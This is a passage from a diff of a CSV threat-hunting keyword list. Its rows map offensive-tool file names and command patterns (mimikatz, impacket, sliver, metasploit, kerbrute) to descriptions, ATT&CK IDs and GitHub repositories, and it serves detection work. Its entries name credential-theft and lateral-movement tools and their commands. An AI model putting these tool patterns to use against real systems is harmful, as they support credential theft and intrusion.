T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","744","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" +"*root-shellcode-linux*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*rop.find_gadgets*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "*RopChain.py*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "*ROPEngine.cpp*","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","375","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" @@ -15917,41 +16098,41 @@ "*ropfuscator-*","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","375","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" "*ropfuscator.*","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","375","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" "*ropnop/go-windapsearch*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*ropnop/kerbrute*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*rottenpotato.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*rottenpotato.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*RottenPotatoVulnerable.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*ropnop/kerbrute*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*rottenpotato.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*rottenpotato.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*RottenPotatoVulnerable.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*routerpasswords.com/*","offensive_tool_keyword","routerpasswords.com","find default routers passwords","T1110.003 - T1200","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","1","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" -"*routers_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*routersploit*","offensive_tool_keyword","routersploit","The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.exploits","T1210.001 - T1190 - T1213 - T1189","TA0007 - TA0002 - TA0001 - TA0011","N/A","N/A","Frameworks","https://github.com/threat9/routersploit","1","1","N/A","N/A","10","11408","2303","2023-05-22T21:50:32Z","2016-03-30T11:43:12Z" -"*rpc://* -rpc-mode ICPR -icpr-ca-name *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*rpc::close*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*rpc::connect*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*rpc::enum*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*rpc::server*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*routers_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*routersploit*","offensive_tool_keyword","routersploit","The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.exploits","T1210.001 - T1190 - T1213 - T1189","TA0007 - TA0002 - TA0001 - TA0011","N/A","N/A","Frameworks","https://github.com/threat9/routersploit","1","1","N/A","N/A","10","11407","2303","2023-05-22T21:50:32Z","2016-03-30T11:43:12Z" +"*rpc://* -rpc-mode ICPR -icpr-ca-name *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*rpc::close*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*rpc::connect*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*rpc::enum*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*rpc::server*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*rpcattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*rpcattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*rpc-backdoor.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*rpc-beacons.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*rpcattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*rpc-backdoor.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*rpc-beacons.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*rpcdump.py * | grep MS-RPRN*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" -"*rpcdump.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*rpcdump_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*rpc-hijack.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*rpc-kill.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*rpcmap.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*rpc-msf.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*rpcrelayclient.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*rpcdump.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*rpcdump_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*rpc-hijack.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*rpc-kill.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*rpcmap.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol 